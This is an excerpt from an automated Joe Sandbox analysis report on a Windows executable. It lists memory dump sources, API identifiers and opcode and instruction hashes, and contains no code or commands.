                                    • Instruction Fuzzy Hash: 1B11EC32618F4182EB618B1AF440269B7E5FB98FA4F5842B5EA8D07768DF3CD5618B00
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: TimerWaitable
                                    • String ID: amps_Get: pHandle=%p, propId=%d, val=%p, vSize=%d
                                    • API String ID: 1823812067-3336177065
                                    • Opcode ID: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                    • Instruction ID: 709d983207ec740d9f2c7308925ee729c80a4ac6442fb255827ec98b57545574
                                    • Opcode Fuzzy Hash: ec5ea581405e177efc46dfcfb63def396c6c184119c2e2df6ecfca0784b7c7fe
                                    • Instruction Fuzzy Hash: 731170B2614B8082D711CF16F480B9AB7A4F38CBE4F444216BF9C47B68CF78C5508B40
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.2727724784.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                    • Associated: 00000005.00000002.2727708710.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727744651.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727761462.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000005.00000002.2727781579.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_140000000_CrwRQN.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                    • Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
                                    • Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
                                    • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710